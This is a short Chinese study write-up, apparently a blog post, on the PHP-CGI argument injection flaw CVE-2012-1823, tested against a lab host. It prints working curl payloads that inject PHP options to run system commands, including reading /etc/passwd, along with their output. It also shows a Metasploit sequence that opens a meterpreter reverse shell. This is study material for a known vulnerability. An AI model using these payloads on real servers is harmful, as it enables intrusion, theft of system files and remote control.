CVE-2012-1823学习
来源:互联网 发布:中标麒麟软件大全 编辑:程序博客网 时间:2024/05/05 14:56
参考:
https://pentesterlab.com/exercises/cve-2012-1823/course
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
user@debian:~$ php-cgi -hUsage: php [-q] [-h] [-s] [-v] [-i] [-f ] php [args...] -a Run interactively -b | Bind Path for external FASTCGI Server mode -C Do not chdir to the script's directory -c | Look for php.ini file in this directory -n No php.ini file will be used -d foo[=bar] Define INI entry foo with value 'bar' -e Generate extended information for debugger/profiler -f Parse . Implies `-q' -h This help -i PHP information -l Syntax check only (lint) -m Show compiled in modules -q Quiet-mode. Suppress HTTP Header output. -s Display colour syntax highlighted source. -v Version number -w Display source with stripped comments and whitespace. -z Load Zend extension . -T Measure execution time of script repeated times.
于是我们试一下http://192.168.170.133/index.php?-s
或者http://192.168.170.133/?-s
即可查看到该文件index.php的源码。
将『
➜ ~ curl "http://192.168.170.133/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" --data "<?php system('uname -a');die(); ?>"Linux debian 2.6.32-5-amd64 #1 SMP Thu Mar 22 17:26:33 UTC 2012 x86_64 GNU/Linux➜ ~ curl "http://192.168.170.133/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" --data "<?php system('cat /etc/passwd');die(); ?>"root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/sh...
利用metasploit
# php-cgi.msfuse exploit/multi/http/php_cgi_arg_injectionset RHOST 192.168.170.133set RPORT 80set PAYLOAD php/meterpreter/reverse_tcpset LHOST 192.168.170.132exploit
0 0
- CVE-2012-1823学习
- cve 2013-0912学习
- CVE-2012-1493
- 浅析CVE-2012-4220
- 浅析CVE-2012-0056
- CVE-2012-4969
- CVE-2012-0158
- CVE-2012-4792
- CVE-2012-0158分析
- CVE
- Cve-2012-1823 PHP CGI Argument Injection Exploit
- CVE-2012-1823 php-cgi漏洞 metasploit利用脚本
- CVE-2012-1823 php-cgi远程代码执行
- 浅析cve-2011-1823(Gingerbreak)
- 失之交臂的 cve 2012-0181
- cve-2012-1876 win7_ie8_leak_shellcode code
- CVE-2012-1535分析报告
- CVE-2012-0158分析报告
- 49 Group Anagrams
- IOS常用宏定义
- 一次性dissmiss多个Viewcontroller
- 1020. 月饼 (25)-PAT乙级
- UIImageView实现图片平铺
- CVE-2012-1823学习
- 在网上找了一段javascript写的浮动窗口的拖拽,发现因为浏览器版本等问题,使用有些问题,稍微修改了一些
- 22 Generate Parentheses
- 设计模式之SOLID原则
- 给控件添加点击响应事件UITapGestureRecognizer
- ArrayList,Vector,LinkedList的存储性能和特性
- [leetCode刷题笔记]2017.03.26
- Project Euler Problem 19 Counting Sundays
- 关于IOS多线程